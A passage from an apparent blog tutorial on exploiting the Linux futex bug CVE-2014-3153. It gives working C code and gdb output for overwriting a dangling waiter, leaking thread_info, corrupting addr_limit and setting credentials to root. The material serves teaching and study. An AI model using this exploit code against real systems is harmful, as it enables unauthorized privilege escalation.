<span class="n">server_sockfd</span> <span class="o">=</span> <span class="n">fds</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">send</span><span class="p">(</span><span class="n">client_sockfd</span><span class="p">,</span> <span class="n">BLOCKBUF</span><span class="p">,</span> <span class="n">BLOCKBUFLEN</span><span class="p">,</span> <span class="n">MSG_DONTWAIT</span><span class="p">)</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="p">;</span>
<span class="n">assert</span><span class="p">(</span><span class="n">errno</span> <span class="o">==</span> <span class="n">EWOULDBLOCK</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The function creates a pair of UNIX sockets of type <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> and then
sends <code class="language-plaintext highlighter-rouge">AAAAAAAA</code> over the socket untill the call to <code class="language-plaintext highlighter-rouge">send</code> fails with <code class="language-plaintext highlighter-rouge">EWOULDBLOCK</code> as the <code class="language-plaintext highlighter-rouge">errno</code>.
Note the <code class="language-plaintext highlighter-rouge">MSG_DONTWAIT</code> flag that makes the <code class="language-plaintext highlighter-rouge">send</code> return immediately instead of blocking.</p>
<blockquote>
<p>MSG_DONTWAIT<br />
Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.</p>
</blockquote>
<p>Afterwards we assert that <code class="language-plaintext highlighter-rouge">EWOULDBLOCK</code> is in fact the reason the operation failed.</p>
<p>Next up, we’re ready for actually invoking our <code class="language-plaintext highlighter-rouge">sendmmsg</code> to overwrite <code class="language-plaintext highlighter-rouge">rt_waiter</code>. Exciting!</p>
<p>For the sake of overwriting the waiter’s list entries properly, which is what we’re interested in,
we’d need to align the <code class="language-plaintext highlighter-rouge">iovstack</code> in kernelspace, which is the <code class="language-plaintext highlighter-rouge">iovec</code> in userspace accordingly.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define COUNT_OF(arr) (sizeof(arr) / sizeof(arr[0]))
</span>
<span class="k">struct</span> <span class="n">mmsghdr</span> <span class="n">msgvec</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="n">msg</span><span class="p">[</span><span class="mi">7</span><span class="p">];</span>
<span class="kt">void</span> <span class="nf">setup_msgs</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">COUNT_OF</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">msg</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">iov_base</span> <span class="o">=</span> <span class="mh">0x41414141</span><span class="p">;</span>
<span class="n">msg</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">iov_len</span> <span class="o">=</span> <span class="mh">0xace</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">msgvec</span><span class="p">.</span><span class="n">msg_hdr</span><span class="p">.</span><span class="n">msg_iov</span> <span class="o">=</span> <span class="n">msg</span><span class="p">;</span>
<span class="n">msgvec</span><span class="p">.</span><span class="n">msg_hdr</span><span class="p">.</span><span class="n">msg_iovlen</span> <span class="o">=</span> <span class="n">COUNT_OF</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>In this function I setup the messages, the <code class="language-plaintext highlighter-rouge">iovec</code>, in the hope that it would overwrite the waiter’s struct once I call <code class="language-plaintext highlighter-rouge">sendmmsg</code>.
Once again, I’ve placed two breakpoints at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> and <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
(gdb) cont
Continuing.
Breakpoint 3, ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
(gdb) fin
Run till exit from #0 ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
^C
Program received signal SIGINT, Interrupt.
(gdb) p *$waiter
$26 = {
list_entry = {
prio = 0xace,
prio_list = {
next = 0x41414141,
prev = 0xace
},
node_list = {
next = 0x41414141,
prev = 0xace
}
...
}
</code></pre></div></div>
<p>There are many interesting things to look at from this experiment. Let’s go over it.</p>
<p>Just as before, I store <code class="language-plaintext highlighter-rouge">rt_waiter</code>’s address. Upon <code class="language-plaintext highlighter-rouge">___sys_sendmmsg</code> I continue the execution until the function is about to exit.
However, because the function is blocking, I have to interrupt the debugger with a <code class="language-plaintext highlighter-rouge">^C</code>.
Once the function blocks, it had already filled the <code class="language-plaintext highlighter-rouge">iovstack</code>.
After I do that, I browse the waiter struct and I see that the overwrite occured just as I wanted it to.</p>
<p><img src="https://i.imgur.com/npV3oAT.png" alt="Waiter Overwritten Image" /></p>
<p style="text-align: center; font-style: italic"><small>(In reality there's only a single waiter)</small></p>
<p>That’s great! We can now overwrite the dangling waiter’s memory.</p>
<p>Let’s review this as a whole within the the exploit code.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="o">*</span><span class="nf">forge_waiter</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Placing the fake waiter on the dangling node within the mutex's waiters list."</span><span class="p">);</span>
<span class="n">setup_msgs</span><span class="p">();</span>
<span class="n">setup_sockets</span><span class="p">();</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">fwait_requeue</span><span class="p">(</span><span class="o">&</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">sendmmsg</span><span class="p">(</span><span class="n">client_sockfd</span><span class="p">,</span> <span class="o">&</span><span class="n">msgvec</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">pthread_t</span> <span class="n">forger</span><span class="p">,</span> <span class="n">ref_holder</span><span class="p">;</span>
<span class="n">lock_pi_futex</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">forger</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">forge_waiter</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="n">frequeue</span><span class="p">(</span><span class="o">&</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">ref_holder</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">lock_pi_futex</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">pi_futex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">frequeue</span><span class="p">(</span><span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We’ve already reviewed <code class="language-plaintext highlighter-rouge">setup_msg()</code>, <code class="language-plaintext highlighter-rouge">setup_sockets()</code>, and <code class="language-plaintext highlighter-rouge">fwait_requeue()</code> would block until the self-requeue is triggered.
First thing when it exits, <code class="language-plaintext highlighter-rouge">sendmmsg()</code> is called to overwrite the waiter, which also blocks.</p>
<p>You could see that I create another thread called <code class="language-plaintext highlighter-rouge">ref_holder</code> which also attempts to lock <code class="language-plaintext highlighter-rouge">pi_futex</code> which in turns forms another waiter instance.
The reason this is needed is because the state of the futex would get destroyed if there aren’t any contending waiters on the lock.</p>
<h1 id="kernel-infoleak">Kernel Infoleak</h1>
<p>Our next goal would be to leak an address that would help us target the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> of our process which contains its <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a>
so that we can overwrite it later to gain <code class="language-plaintext highlighter-rouge">root</code> privileges.</p>
<p>The way we go about doing it is using a fake waiter and when we’d attempt to lock the futex once again,
another waiter would be added to the waiters list which would result in writing to the adjacent nodes which would be under our control.
Once that happens, we’d be able to inspect the kernel address from userspace via the fake waiter list nodes.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define DEFAULT_PRIO 120
#define THREAD_INFO_BASE 0xffffe000
</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="n">fake_waiter</span><span class="p">,</span> <span class="n">leaker_waiter</span><span class="p">;</span>
<span class="n">pthread_t</span> <span class="n">corrupter</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">link_fake_leaker_waiters</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">node_list</span><span class="p">.</span><span class="n">prev</span> <span class="o">=</span> <span class="o">&</span><span class="n">leaker_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">node_list</span><span class="p">;</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">.</span><span class="n">prev</span> <span class="o">=</span> <span class="o">&</span><span class="n">leaker_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">;</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio</span> <span class="o">=</span> <span class="n">DEFAULT_PRIO</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">leak_thread_info</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">link_fake_leaker_waiters</span><span class="p">();</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">corrupter</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">lock_pi_futex</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">corrupter_thread_info</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">thread_info</span> <span class="o">*</span><span class="p">)((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">leaker_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">.</span><span class="n">next</span> <span class="o">&</span> <span class="n">THREAD_INFO_BASE</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Corrupter's thread_info @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">corrupter_thread_info</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Let’s first address what’s called a “Thread Info”.<br />
<a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a> is a thread descriptor that is held within the kernel and is placed on the stack’s address space.
For each thread that we create using <code class="language-plaintext highlighter-rouge">pthread_create()</code> a new <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a> is generated in the kernel.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">thread_info</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span> <span class="cm">/* main task structure */</span>
<span class="k">struct</span> <span class="n">exec_domain</span> <span class="o">*</span><span class="n">exec_domain</span><span class="p">;</span> <span class="cm">/* execution domain */</span>
<span class="n">__u32</span> <span class="n">flags</span><span class="p">;</span> <span class="cm">/* low level flags */</span>
<span class="n">__u32</span> <span class="n">status</span><span class="p">;</span> <span class="cm">/* thread synchronous flags */</span>
<span class="n">__u32</span> <span class="n">cpu</span><span class="p">;</span> <span class="cm">/* current CPU */</span>
<span class="kt">int</span> <span class="n">preempt_count</span><span class="p">;</span> <span class="cm">/* 0 => preemptable,
<0 => BUG */</span>
<span class="n">mm_segment_t</span> <span class="n">addr_limit</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">restart_block</span> <span class="n">restart_block</span><span class="p">;</span>
<span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">sysenter_return</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">sig_on_uaccess_error</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uaccess_err</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span> <span class="cm">/* uaccess failed */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The reason it interests us is because it’s relatively easy to get its address once you have a leak,
and the more interesting reason is that it contains a pointer to the process’ <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a>.
Just to clarify, a new <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> is also created for each thread.</p>
<p>In order to do the actual leak, we link together two fake waiters.
One is named <code class="language-plaintext highlighter-rouge">fake_waiter</code> which is used for general list corruption,
and the other is called <code class="language-plaintext highlighter-rouge">leaker_waiter</code> because its sole usage is to leak addresses through.</p>
<p>By linking I mean in practice that we set the previous node of the <code class="language-plaintext highlighter-rouge">fake_waiter</code> to be the <code class="language-plaintext highlighter-rouge">leaker_waiter</code>,
and set its priority to be the default priority of a task plus one so that it’ll place itself after the <code class="language-plaintext highlighter-rouge">leaker_waiter</code>.
Priority is a value that correlates to the process’ niceness.</p>
<p><img src="https://i.imgur.com/5HtvkBq.png" alt="Crafted Waiter Image" /></p>
<p style="text-align: center; font-style: italic"><small>Those aren't the actual priorities but the idea remains.</small></p>
<p>After we’ve linked the waiters in userspace,
we call <code class="language-plaintext highlighter-rouge">lock_pi_futex()</code> on another thread so that a waiter is created which attempts to add itself into the list.
Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to <code class="language-plaintext highlighter-rouge">leaker_waiter</code>.</p>
<p><img src="https://i.imgur.com/uAJDaJF.png" alt="New Waiter Image" /></p>
<p>Awesome! We’ve leaked a kernel stack address of one of the threads in our program.</p>
<p>In order to target its <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a>, all we have to do is AND its address with <code class="language-plaintext highlighter-rouge">THREAD_INFO_BASE</code>.
You can see that from <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L174"><code class="language-plaintext highlighter-rouge">current_thread_info()</code></a>’s implementation, though that might vary across different architectures.
Here’s the source for x86.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* how to get the thread information struct from C */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">thread_info</span> <span class="o">*</span><span class="nf">current_thread_info</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="k">struct</span> <span class="n">thread_info</span> <span class="o">*</span><span class="p">)</span>
<span class="p">(</span><span class="n">current_stack_pointer</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">THREAD_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We have a hold of the <code class="language-plaintext highlighter-rouge">thread_info</code> location in memory.</p>
<h1 id="overwriting-address-limit">Overwriting Address Limit</h1>
<p>Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes.
The first memory area that we’ll be targeting is what’s called the “Address Limit”.</p>
<p>It lays under <code class="language-plaintext highlighter-rouge">thread_info.addr_limit</code> as you can see in <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a> above.
It is used for limiting the virtual address space that is reserved for the user.
When the kernel works with user-provided addresses,
it compares them to the thread’s <code class="language-plaintext highlighter-rouge">addr_limit</code> in order to verify that it’s a valid userspace address.
If the supplied address is smaller than <code class="language-plaintext highlighter-rouge">addr_limit</code>, the designated memory area is in fact from userspace.</p>
<p>The <code class="language-plaintext highlighter-rouge">addr_limit</code> is an excellent target for initial kernel overwrite because once you overwrite it with <code class="language-plaintext highlighter-rouge">0xffffffff</code>,
you have gotten full arbitrary read and write capabilities to kernel memory.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kmemcpy</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">dst</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">pipefd</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pipe</span><span class="p">(</span><span class="n">pipefd</span><span class="p">));</span>
<span class="n">assert</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">pipefd</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">src</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span> <span class="o">==</span> <span class="n">len</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="n">read</span><span class="p">(</span><span class="n">pipefd</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">dst</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span> <span class="o">==</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">escalate_priv_sighandler</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">corrupter_task</span><span class="p">,</span> <span class="o">*</span><span class="n">main_task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">cred</span> <span class="o">*</span><span class="n">main_cred</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">root_id</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">highest_addr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Escalating main thread's privileges to root."</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">highest_addr</span><span class="p">,</span> <span class="o">&</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">addr_limit</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">highest_addr</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Written 0x%x to addr_limit.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">task</span><span class="p">,</span> <span class="o">&</span><span class="n">corrupter_task</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">task</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Corrupter's task_struct @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">corrupter_task</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">corrupter_task</span><span class="o">-></span><span class="n">group_leader</span><span class="p">,</span> <span class="o">&</span><span class="n">main_task</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">corrupter_task</span><span class="o">-></span><span class="n">group_leader</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Main thread's task_struct @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">main_task</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">main_task</span><span class="o">-></span><span class="n">cred</span><span class="p">,</span> <span class="o">&</span><span class="n">main_cred</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">main_task</span><span class="o">-></span><span class="n">cred</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Main thread's cred @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">main_cred</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">COUNT_OF</span><span class="p">(</span><span class="n">main_cred</span><span class="o">-></span><span class="n">ids</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">root_id</span><span class="p">,</span> <span class="o">&</span><span class="n">main_cred</span><span class="o">-></span><span class="n">ids</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">root_id</span><span class="p">));</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Escalated privileges to root successfully."</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">escalate_priv</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">pthread_t</span> <span class="n">addr_limit_writer</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sigaction</span> <span class="n">sigact</span> <span class="o">=</span> <span class="p">{.</span><span class="n">sa_handler</span> <span class="o">=</span> <span class="n">escalate_priv_sighandler</span><span class="p">};</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">sigaction</span><span class="p">(</span><span class="n">SIGINT</span><span class="p">,</span> <span class="o">&</span><span class="n">sigact</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Registered the privileges escalator signal handler for interrupting the corrupter thread."</span><span class="p">);</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">.</span><span class="n">prev</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">addr_limit</span><span class="p">;</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">addr_limit_writer</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">lock_pi_futex</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">pthread_kill</span><span class="p">(</span><span class="n">corrupter</span><span class="p">,</span> <span class="n">SIGINT</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>After we’ve executed <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L138"><code class="language-plaintext highlighter-rouge">leak_thread_info()</code></a>, we’re going to call <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L123"><code class="language-plaintext highlighter-rouge">escalate_priv()</code></a>.
The first thing that it does is register <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L95"><code class="language-plaintext highlighter-rouge">escalate_priv_sighandler</code></a> as the <code class="language-plaintext highlighter-rouge">SIGINT</code> signal handler using the <a href="https://man7.org/linux/man-pages/man2/sigaction.2.html"><code class="language-plaintext highlighter-rouge">sigaction()</code></a> syscall.</p>
<p>Let’s briefly mention what signal handlers are and why do we use them.
A signal handler is a function that is called by the target environment when the corresponding signal occurs.
The target environment <strong>suspends execution</strong> of the program until the signal handler returns.</p>
<p>This mechanism allows us to <strong>interrupt</strong> the process’ job in order to perform some other work.
In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread.
However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten,
but if you block you can’t exploit the stack’s state.</p>
<p>That’s why signal are needed and why they’re used in our scenario.
They allow us to execute code within the process’ context <strong>outside its normal execution flow</strong>.</p>
<p>I’m reminding you that when talking about <code class="language-plaintext highlighter-rouge">pthreads</code>, all the signal handlers are shared with the parent process,
that is because internally <code class="language-plaintext highlighter-rouge">pthreads</code> passes both <code class="language-plaintext highlighter-rouge">CLONE_THREAD | CLONE_SIGHAND</code> flags when it creates the child process with <a href="https://man7.org/linux/man-pages/man2/clone.2.html"><code class="language-plaintext highlighter-rouge">clone()</code></a>.</p>
<blockquote>
<p>CLONE_THREAD<br />
The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.</p>
</blockquote>
<p>Afterwards, we’re going to place the address that we want to write to, that is <code class="language-plaintext highlighter-rouge">&corrupter_thread_info->addr_limit</code>, as the fake waiter’s previous node.
Once we’ll attempt to lock the futex, the newly created waiter would write its own address to the <code class="language-plaintext highlighter-rouge">addr_limit</code>.
Not yet something that we can control,
but rather a value that is guaranteed to be bigger than the current one because <code class="language-plaintext highlighter-rouge">addr_limit</code> is at the bottom-most of the virtual address space.</p>
<p>Now we’ve arrived to a scenario where <code class="language-plaintext highlighter-rouge">addr_limit > &addr_limit</code> is surely true.
Once this is condition is met, we can simply write to <code class="language-plaintext highlighter-rouge">addr_lmit</code> once again on our own!
This is where the signaling come into play, and specifically the <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L95"><code class="language-plaintext highlighter-rouge">escalate_priv_sighandler</code></a> from earlier.</p>
<p>Because each thread has its own <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a>, which in turn means that each thread also has its own <code class="language-plaintext highlighter-rouge">addr_limit</code>,
we’d need a way to interrupt the <em>specific</em> thread whose <code class="language-plaintext highlighter-rouge">addr_limit</code> we’ve overwritten.
Therefore, after we’ve “increased” the address limit, only that thread would be able to utilize and exploit this feature.
This is where we signal the <code class="language-plaintext highlighter-rouge">addr_limit_writer</code> thread using <code class="language-plaintext highlighter-rouge">pthread_kill()</code> which triggers the execution of <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L95"><code class="language-plaintext highlighter-rouge">escalate_priv_sighandler</code></a>.</p>
<p>What this function does is read and write to different areas in kernel memory.
In order to do it, I wrote a small helper function called <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L40"><code class="language-plaintext highlighter-rouge">kmemcpy()</code></a>.
It exploits the fact that <code class="language-plaintext highlighter-rouge">addr_limit</code> had been overwritten, it creates a pipe which it reads from and writes to.
